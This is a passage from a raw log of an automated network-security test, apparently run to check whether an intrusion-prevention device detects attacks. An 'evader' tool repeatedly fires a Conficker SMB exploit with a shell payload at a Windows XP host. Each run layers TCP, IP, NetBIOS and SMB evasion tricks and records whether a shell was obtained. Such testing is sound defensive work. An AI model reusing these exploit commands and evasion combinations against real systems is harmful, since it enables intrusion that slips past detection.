  3834. The duplicate packet has shuffled payload
  3835.  
  3836. Info: NetBIOS connection 10.62.90.113:24268 -> 10.35.1.207:445
  3837. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3838. Info: Sending MSRPC request with exploit
  3839. Info: Shell found, attack succeeded
  3840. Info: CommandShell::SendCommand() - Failed to send string
  3841. Info: Command shell connection reset.
  3842. Info: Shell closed
  3843. 0: Success.
  3844. ..
  3845. 6613 runs averaging 1.95 runs / second ; progress: 3400/43200..2015-06-08 00:16:11 INFO
  3846. Success. (10.62.90.114):
  3847. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25887 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=fnJDHWfO8Io --evasion=[smb_connect,smb_openpipe]netbios_chaff,"25%","empty_unspec|empty_keepalive|msrpc_req" --evasion=[smb_openpipe,end]tcp_paws,"75%","88733991","zero" --verifydelay=1000 --payload=shell
  3848. Info: Using random seed fnJDHWfO8Ip
  3849. The following evasions are applied from stage smb_connect to smb_openpipe:
  3850. - 25% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
  3851. The following evasions are applied from stage smb_openpipe to end:
  3852. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 88733991> and has 0x00 bytes as payload
  3853.  
  3854. Info: NetBIOS connection 10.62.90.114:25887 -> 10.35.1.207:445
  3855. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3856. Info: Sending MSRPC request with exploit
  3857. Info: Shell found, attack succeeded
  3858. Info: CommandShell::SendCommand() - Failed to send string
  3859. Info: Command shell connection reset.
  3860. Info: Shell closed
  3861. 0: Success.
  3862. .....
  3863. 6621 runs averaging 1.94 runs / second ; progress: 3405/43200...
  3864. 6624 runs averaging 1.94 runs / second ; progress: 3410/43200
  3865. 6624 runs averaging 1.94 runs / second ; progress: 3415/43200......
  3866. 6630 runs averaging 1.94 runs / second ; progress: 3420/43200..............
  3867. 6644 runs averaging 1.94 runs / second ; progress: 3425/43200..............
  3868. 6658 runs averaging 1.94 runs / second ; progress: 3430/43200............
  3869. 6670 runs averaging 1.94 runs / second ; progress: 3435/43200....Pid 20341 timed out - killed
  3870. 2015-06-08 00:16:47 INFO
  3871. Timed out (10.62.90.117):
  3872. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16556 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=RMgfaYyc57k --evasion=[msrpc_req,end]tcp_tsoptreply,"le" --evasion=[smb_opentree,end]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
  3873. Info: Using random seed RMgfaYyc57l
  3874. The following evasions are applied from stage smb_opentree to end:
  3875. - Add a random alphaurgent data byte to every 2 TCP segment.
  3876. The following evasions are applied from stage msrpc_req to end:
  3877. - TCP timestamps echo reply value is sent in the wrong endianness
  3878.  
  3879. Info: NetBIOS connection 10.62.90.117:16556 -> 10.35.1.207:445
  3880. Terminated
  3881. .........
  3882. 6684 runs averaging 1.94 runs / second ; progress: 3440/43200...........
  3883. 6695 runs averaging 1.94 runs / second ; progress: 3445/43200.....2015-06-08 00:16:58 INFO
  3884. Success. (10.62.90.113):
  3885. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38858 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=9ilraWnyxh4 --evasion=[smb_openpipe,msrpc_bind]tcp_paws,"25%","4","alphanumrandomized" --evasion=[msrpc_bind,end]tcp_paws,"1","4961990","random_alpha" --verifydelay=1000 --payload=shell
  3886. Info: Using random seed 9ilraWnyxh7
  3887. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  3888. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphanumeric bytes randomized
  3889. The following evasions are applied from stage msrpc_bind to end:
  3890. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4961990> and has random alpha bytes as payload
  3891.  
  3892. Info: NetBIOS connection 10.62.90.113:38858 -> 10.35.1.207:445
  3893. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3894. Info: Sending MSRPC request with exploit
  3895. Info: Shell found, attack succeeded
  3896. Info: Shell closed
  3897. 0: Success.
  3898. ....
  3899. 6705 runs averaging 1.94 runs / second ; progress: 3450/43200........
  3900. 6713 runs averaging 1.94 runs / second ; progress: 3455/43200.........
  3901. 6722 runs averaging 1.94 runs / second ; progress: 3460/43200..........
  3902. 6732 runs averaging 1.94 runs / second ; progress: 3465/43200.....
  3903. 6737 runs averaging 1.94 runs / second ; progress: 3470/43200...
  3904. 6740 runs averaging 1.94 runs / second ; progress: 3475/43200.....
  3905. 6745 runs averaging 1.94 runs / second ; progress: 3480/43200............
  3906. 6757 runs averaging 1.94 runs / second ; progress: 3485/432002015-06-08 00:17:35 INFO
  3907. Success. (10.62.90.114):
  3908. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29037 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=zoGhygQj2a0 --evasion=[smb_connect,msrpc_bind]ipv4_opt,"2","inc","shuffletcp" --evasion=[smb_openpipe,end]tcp_paws,"50%","33475370","zero" --verifydelay=1000 --payload=shell
  3909. Info: Using random seed zoGhygQj2a3
  3910. The following evasions are applied from stage smb_connect to msrpc_bind:
  3911. - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  3912. The duplicate packet has shuffled TCP payload
  3913. The following evasions are applied from stage smb_openpipe to end:
  3914. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 33475370> and has 0x00 bytes as payload
  3915.  
  3916. Info: NetBIOS connection 10.62.90.114:29037 -> 10.35.1.207:445
  3917. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3918. Info: Sending MSRPC request with exploit
  3919. Info: Shell found, attack succeeded
  3920. Info: Shell closed
  3921. 0: Success.
  3922. ......
  3923. 6764 runs averaging 1.94 runs / second ; progress: 3490/43200....
  3924. 6768 runs averaging 1.94 runs / second ; progress: 3495/43200.......
  3925. 6775 runs averaging 1.94 runs / second ; progress: 3500/43200........
  3926. 6783 runs averaging 1.94 runs / second ; progress: 3505/43200.
  3927. 6784 runs averaging 1.93 runs / second ; progress: 3510/43200
  3928. 6784 runs averaging 1.93 runs / second ; progress: 3515/43200
  3929. 6784 runs averaging 1.93 runs / second ; progress: 3520/43200....
  3930. 6788 runs averaging 1.93 runs / second ; progress: 3525/43200.....
  3931. 6793 runs averaging 1.92 runs / second ; progress: 3530/43200..Pid 21204 timed out - killed
  3932. 2015-06-08 00:18:21 INFO
  3933. Timed out (10.62.90.118):
  3934. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33089 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=BaIgcwZW4VQ --evasion=[start,netbios_connect]tcp_chaff,"2","nullchksum|nullflag|longhdr","unmodified" --evasion=[netbios_connect,msrpc_bind]tcp_overlap,"1478","new","random" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
  3935. Info: Using random seed BaIgcwZW4VQ
  3936. The following evasions are applied from stage start to netbios_connect:
  3937.  
  3938. The following evasions are applied from stage netbios_connect to msrpc_bind:
  3939. - TCP segments are set to overlap by 1478 bytes, with the later packet containing the correct payload. Overlapping part has random bytes as payload
  3940. The following evasions are applied from stage smb_opentree to msrpc_req:
  3941. - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
  3942.  
  3943. Info: NetBIOS connection 10.62.90.118:33089 -> 10.35.1.207:445
  3944. Terminated
  3945. ........
  3946. 6804 runs averaging 1.92 runs / second ; progress: 3535/43200.....
  3947. 6809 runs averaging 1.92 runs / second ; progress: 3540/43200......
  3948. 6815 runs averaging 1.92 runs / second ; progress: 3545/43200......
  3949. 6821 runs averaging 1.92 runs / second ; progress: 3550/43200.........
  3950. 6830 runs averaging 1.92 runs / second ; progress: 3555/43200Pid 21497 timed out - killed
  3951. 2015-06-08 00:18:45 INFO
  3952. Timed out (10.62.90.115):
  3953. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62671 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=o7JIQ5gkSRo --evasion=[msrpc_bind,end]ipv4_frag,"56" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
  3954. Info: Using random seed o7JIQ5gkSRq
  3955. The following evasions are applied from stage smb_opentree to msrpc_bind:
  3956. - Add a random alphaurgent data byte to every 2 TCP segment.
  3957. The following evasions are applied from stage msrpc_bind to end:
  3958. - IPv4 fragments with at most 56 bytes per fragment
  3959.  
  3960. Info: NetBIOS connection 10.62.90.115:62671 -> 10.35.1.207:445
  3961. Terminated
  3962. .....
  3963. 6836 runs averaging 1.92 runs / second ; progress: 3560/43200.......
  3964. 6843 runs averaging 1.92 runs / second ; progress: 3565/43200Pid 21595 timed out - killed
  3965. 2015-06-08 00:18:55 INFO
  3966. Timed out (10.62.90.110):
  3967. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13471 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=xLQU+B0/gW8 --evasion=[smb_opentree,msrpc_bind]smb_decoytrees,"1","3","8","random" --evasion=[msrpc_bind,end]smb_seg,"4" --evasion=[smb_opentree,end]tcp_paws,"2","2","alphanumrandomized" --verifydelay=1000 --payload=shell
  3968. Info: Using random seed xLQU+B0/gW/
  3969. The following evasions are applied from stage smb_opentree to end:
  3970. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has original payload with alphanumeric bytes randomized
  3971. The following evasions are applied from stage smb_opentree to msrpc_bind:
  3972. - Before normal SMB writes, 1 SMB trees are opened and 3 writes are performed to them. The write payload is 8 random bytes.
  3973. The following evasions are applied from stage msrpc_bind to end:
  3974. - SMB writes are segmented to contain at most 4 bytes of payload.
  3975.  
  3976. Info: NetBIOS connection 10.62.90.110:13471 -> 10.35.1.207:445
  3977. Terminated
  3978. ............
  3979. 6856 runs averaging 1.92 runs / second ; progress: 3570/43200..................
  3980. 6874 runs averaging 1.92 runs / second ; progress: 3575/43200.....
  3981. 6879 runs averaging 1.92 runs / second ; progress: 3581/43200.
  3982. 6880 runs averaging 1.92 runs / second ; progress: 3586/43200.....
  3983. 6885 runs averaging 1.92 runs / second ; progress: 3591/43200.........2015-06-08 00:19:24 INFO
  3984. Success. (10.62.90.116):
  3985. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22534 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=E1WN1gofr4c --evasion=[start,netbios_connect]tcp_paws,"25%","2","alpharandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","5","alpharandomized" --evasion=[netbios_connect,smb_connect]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  3986. Info: Using random seed E1WN1gofr4c
  3987. The following evasions are applied from stage start to netbios_connect:
  3988. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has original payload with alphabetic bytes randomized
  3989. The following evasions are applied from stage netbios_connect to smb_connect:
  3990. - TCP timestamps echo reply value is sent in the wrong endianness
  3991. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3992. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has original payload with alphabetic bytes randomized
  3993.  
  3994. Info: NetBIOS connection 10.62.90.116:22534 -> 10.35.1.207:445
  3995. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3996. Info: Sending MSRPC request with exploit
  3997. Info: Shell found, attack succeeded
  3998. Info: Shell closed
  3999. 0: Success.
  4000.  
  4001. 6895 runs averaging 1.92 runs / second ; progress: 3596/43200..Pid 22023 timed out - killed
  4002. 2015-06-08 00:19:27 INFO
  4003. Timed out (10.62.90.111):
  4004. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=27003 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=EpXCyMOuFpI --evasion=[msrpc_bind,end]smb_seg,"6" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
  4005. Info: Using random seed EpXCyMOuFpI
  4006. The following evasions are applied from stage smb_opentree to msrpc_bind:
  4007. - Add a zero urgent data byte to every 2 TCP segment.
  4008. The following evasions are applied from stage msrpc_bind to end:
  4009. - SMB writes are segmented to contain at most 6 bytes of payload.
  4010.  
  4011. Info: NetBIOS connection 10.62.90.111:27003 -> 10.35.1.207:445
  4012. Terminated
  4013. .............
  4014. 6911 runs averaging 1.92 runs / second ; progress: 3601/43200.................
  4015. 6928 runs averaging 1.92 runs / second ; progress: 3606/43200.............
  4016. 6941 runs averaging 1.92 runs / second ; progress: 3611/43200...........
  4017. 6952 runs averaging 1.92 runs / second ; progress: 3616/43200.............
  4018. 6965 runs averaging 1.92 runs / second ; progress: 3621/43200.......2015-06-08 00:19:54 INFO
  4019. Success. (10.62.90.118):
  4020. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16614 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=or/a1zhDenU --evasion=[netbios_connect,smb_connect]ipv4_opt,"8","inc","unmodified" --evasion=[smb_openpipe,end]tcp_paws,"2","8","zero" --verifydelay=1000 --payload=shell
  4021. Info: Using random seed or/a1zhDenW
  4022. The following evasions are applied from stage netbios_connect to smb_connect:
  4023. - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  4024. The duplicate packet has identical payload
  4025. The following evasions are applied from stage smb_openpipe to end:
  4026. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 0x00 bytes as payload
  4027.  
  4028. Info: NetBIOS connection 10.62.90.118:16614 -> 10.35.1.207:445
  4029. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4030. Info: Sending MSRPC request with exploit
  4031. Info: Shell found, attack succeeded
  4032. Info: CommandShell::SendCommand() - Failed to send string
  4033. Info: Command shell connection reset.
  4034. Info: Shell closed
  4035. 0: Success.
  4036. ..
  4037. 6975 runs averaging 1.92 runs / second ; progress: 3626/43200....Pid 22296 timed out - killed
  4038. 2015-06-08 00:19:58 INFO
  4039. Timed out (10.62.90.112):
  4040. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18149 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=7rGocRK0Uq8 --evasion=[smb_connect,msrpc_req]smb_writeandxpad,"1022","zero" --evasion=[smb_connect,msrpc_req]tcp_segvar,"5","65533" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
  4041. Info: Using random seed 7rGocRK0Uq/
  4042. The following evasions are applied from stage smb_connect to msrpc_req:
  4043. - TCP packets are segmented to contain between 5 and 65533 bytes of payload.
  4044. - 1022 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
  4045. The following evasions are applied from stage smb_openpipe to end:
  4046. - 75% probability to add a random urgent data byte to a TCP segment.
  4047.  
  4048. Info: NetBIOS connection 10.62.90.112:18149 -> 10.35.1.207:445
  4049. Terminated
  4050. .....
  4051. 6985 runs averaging 1.92 runs / second ; progress: 3631/43200.........
  4052. 6994 runs averaging 1.92 runs / second ; progress: 3636/43200..
  4053. 6996 runs averaging 1.92 runs / second ; progress: 3641/43200.....
  4054. 7001 runs averaging 1.92 runs / second ; progress: 3646/432002015-06-08 00:20:17 INFO
  4055. Success. (10.62.90.111):
  4056. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51373 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=x4ty6ZS0nOg --evasion=[netbios_connect,smb_opentree]tcp_paws,"5","245151688","zero" --evasion=[smb_openpipe,end]tcp_paws,"75%","268435454","alphanumrandomized" --verifydelay=1000 --payload=shell
  4057. Info: Using random seed x4ty6ZS0nOj
  4058. The following evasions are applied from stage netbios_connect to smb_opentree:
  4059. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 245151688> and has 0x00 bytes as payload
  4060. The following evasions are applied from stage smb_openpipe to end:
  4061. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has original payload with alphanumeric bytes randomized
  4062.  
  4063. Info: NetBIOS connection 10.62.90.111:51373 -> 10.35.1.207:445
  4064. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4065. Info: Sending MSRPC request with exploit
  4066. Info: Shell found, attack succeeded
  4067. Info: Shell closed
  4068. 0: Success.
  4069. .......2015-06-08 00:20:20 INFO
  4070. Success. (10.62.90.112):
  4071. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20184 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=/GWBnefJ0qc --evasion=[smb_opentree,end]smb_decoytrees,"7","1","7","random_msrpcreq" --evasion=[smb_opentree,msrpc_req]tcp_segvar,"6","23567" --verifydelay=1000 --payload=shell
  4072. Info: Using random seed /GWBnefJ0qf
  4073. The following evasions are applied from stage smb_opentree to msrpc_req:
  4074. - TCP packets are segmented to contain between 6 and 23567 bytes of payload.
  4075. The following evasions are applied from stage smb_opentree to end:
  4076. - Before normal SMB writes, 7 SMB trees are opened and 1 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
  4077.  
  4078. Info: NetBIOS connection 10.62.90.112:20184 -> 10.35.1.207:445
  4079. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4080. Info: Sending MSRPC request with exploit
  4081. Info: Shell found, attack succeeded
  4082. Info: CommandShell::SendCommand() - Failed to send string
  4083. Info: Command shell connection reset.
  4084. Info: Shell closed
  4085. 0: Success.
  4086. ...
  4087. 7013 runs averaging 1.92 runs / second ; progress: 3651/43200............2015-06-08 00:20:24 INFO
  4088. Success. (10.62.90.111):
  4089. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50253 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=+EAg6yyT0Q8 --evasion=[netbios_connect,smb_openpipe]netbios_chaff,"3","empty_keepalive|small_unspec|broken_length" --evasion=[msrpc_bind,end]smb_chaff,"21","write_flag","msrpc" --evasion=[smb_connect,end]tcp_paws,"2","138129007","random_alpha" --verifydelay=1000 --payload=shell
  4090. Info: Using random seed +EAg6yyT0Q/
  4091. The following evasions are applied from stage netbios_connect to smb_openpipe:
  4092. - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  4093. The following evasions are applied from stage smb_connect to end:
  4094. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 138129007> and has random alpha bytes as payload
  4095. The following evasions are applied from stage msrpc_bind to end:
  4096. - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  4097.  
  4098. Info: NetBIOS connection 10.62.90.111:50253 -> 10.35.1.207:445
  4099. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4100. Info: Sending MSRPC request with exploit
  4101. Info: Shell found, attack succeeded
  4102. Info: Shell closed
  4103. 0: Success.
  4104. ...
  4105. 7029 runs averaging 1.92 runs / second ; progress: 3656/43200..........
  4106. 7039 runs averaging 1.92 runs / second ; progress: 3661/43200
  4107. 7039 runs averaging 1.92 runs / second ; progress: 3666/43200....
  4108. 7043 runs averaging 1.92 runs / second ; progress: 3671/43200Pid 22703 timed out - killed
  4109. 2015-06-08 00:20:41 INFO
  4110. Timed out (10.62.90.119):
  4111. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11635 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=zuKNA5Eh+dU --evasion=[msrpc_req,end]tcp_overlap,"148","new","random_alpha" --evasion=[start,msrpc_bind]tcp_paws,"3","259841060","random_alpha" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
  4112. Info: Using random seed zuKNA5Eh+dX
  4113. The following evasions are applied from stage start to msrpc_bind:
  4114. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 259841060> and has random alpha bytes as payload
  4115. The following evasions are applied from stage smb_opentree to msrpc_bind:
  4116. - Add a zero urgent data byte to every 2 TCP segment.
  4117. The following evasions are applied from stage msrpc_req to end:
  4118. - TCP segments are set to overlap by 148 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
  4119.  
  4120. Info: NetBIOS connection 10.62.90.119:11635 -> 10.35.1.207:445
  4121. Terminated
  4122. ...2015-06-08 00:20:42 INFO
  4123. Success. (10.62.90.119):
  4124. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34260 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=OThj9hiUOtM --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"3","6","9","zero" --evasion=[smb_connect,end]tcp_paws,"5","6","alphanumrandomized" --verifydelay=1000 --payload=shell
  4125. Info: Using random seed OThj9hiUOtM
  4126. The following evasions are applied from stage smb_connect to end:
  4127. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
  4128. The following evasions are applied from stage smb_opentree to msrpc_req:
  4129. - Before normal SMB writes, 3 SMB trees are opened and 6 writes are performed to them. The write payload is 9 bytes of zeroes.
  4130.  
  4131. Info: NetBIOS connection 10.62.90.119:34260 -> 10.35.1.207:445
  4132. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4133. Info: Sending MSRPC request with exploit
  4134. Info: Shell found, attack succeeded
  4135. Info: CommandShell::SendCommand() - Failed to send string
  4136. Info: Command shell connection reset.
  4137. Info: Shell closed
  4138. 0: Success.
  4139. ..............
  4140. 7062 runs averaging 1.92 runs / second ; progress: 3676/43200........................
  4141. 7086 runs averaging 1.93 runs / second ; progress: 3681/43200....................
  4142. 7106 runs averaging 1.93 runs / second ; progress: 3686/43200............
  4143. 7118 runs averaging 1.93 runs / second ; progress: 3691/43200.........
  4144. 7127 runs averaging 1.93 runs / second ; progress: 3696/43200............
  4145. 7139 runs averaging 1.93 runs / second ; progress: 3701/43200......................
  4146. 7161 runs averaging 1.93 runs / second ; progress: 3706/43200......2015-06-08 00:21:18 INFO
  4147. Success. (10.62.90.111):
  4148. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55696 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=wu99YAOc5D4 --evasion=[start,end]tcp_paws,"1","137960857","random_alpha" --evasion=[smb_connect,smb_opentree]tcp_segvar,"7","9" --verifydelay=1000 --payload=shell
  4149. Info: Using random seed wu99YAOc5D7
  4150. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 137960857> and has random alpha bytes as payload
  4151. The following evasions are applied from stage smb_connect to smb_opentree:
  4152. - TCP packets are segmented to contain between 7 and 9 bytes of payload.
  4153.  
  4154. Info: NetBIOS connection 10.62.90.111:55696 -> 10.35.1.207:445
  4155. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4156. Info: Sending MSRPC request with exploit
  4157. Info: Shell found, attack succeeded
  4158. Info: Shell closed
  4159. 0: Success.
  4160. .....2015-06-08 00:21:20 INFO
  4161. Success. (10.62.90.119):
  4162. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45781 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=ZZ+P5wIie94 --evasion=[smb_connect,msrpc_req]tcp_paws,"1","8","alphanumrandomized" --evasion=[netbios_connect,msrpc_bind]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  4163. Info: Using random seed ZZ+P5wIie95
  4164. The following evasions are applied from stage netbios_connect to msrpc_bind:
  4165. - TCP timestamps echo reply value is sent in the wrong endianness
  4166. The following evasions are applied from stage smb_connect to msrpc_req:
  4167. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has original payload with alphanumeric bytes randomized
  4168.  
  4169. Info: NetBIOS connection 10.62.90.119:45781 -> 10.35.1.207:445
  4170. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4171. Info: Sending MSRPC request with exploit
  4172. Info: Shell found, attack succeeded
  4173. Info: Shell closed
  4174. 0: Success.
  4175. .
  4176. 7175 runs averaging 1.93 runs / second ; progress: 3711/43200...
  4177. 7178 runs averaging 1.93 runs / second ; progress: 3716/43200
  4178. 7178 runs averaging 1.93 runs / second ; progress: 3721/43200.........
  4179. 7187 runs averaging 1.93 runs / second ; progress: 3726/43200........
  4180. 7195 runs averaging 1.93 runs / second ; progress: 3731/43200.....
  4181. 7200 runs averaging 1.93 runs / second ; progress: 3736/43200......
  4182. 7206 runs averaging 1.93 runs / second ; progress: 3741/43200...............
  4183. 7221 runs averaging 1.93 runs / second ; progress: 3746/43200..............2015-06-08 00:22:00 INFO
  4184. Success. (10.62.90.111):
  4185. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57074 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=5cqSwRZrPCA --evasion=[msrpc_req,end]netbios_chaff,"3","empty_keepalive|small_unspec|http_get|msrpc_req|broken_length" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","10","random_alphanum" --verifydelay=1000 --payload=shell
  4186. Info: Using random seed 5cqSwRZrPCD
  4187. The following evasions are applied from stage smb_openpipe to msrpc_req:
  4188. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has random alphanumeric bytes as payload
  4189. The following evasions are applied from stage msrpc_req to end:
  4190. - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  4191.  
  4192. Info: NetBIOS connection 10.62.90.111:57074 -> 10.35.1.207:445
  4193. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4194. Info: Sending MSRPC request with exploit
  4195. Info: Shell found, attack succeeded
  4196. Info: CommandShell::SendCommand() - Failed to send string
  4197. Info: Command shell connection reset.
  4198. Info: Shell closed
  4199. 0: Success.
  4200. ........
  4201. 7244 runs averaging 1.93 runs / second ; progress: 3751/43200..............
  4202. 7258 runs averaging 1.93 runs / second ; progress: 3756/43200..2015-06-08 00:22:08 INFO
  4203. Success. (10.62.90.111):
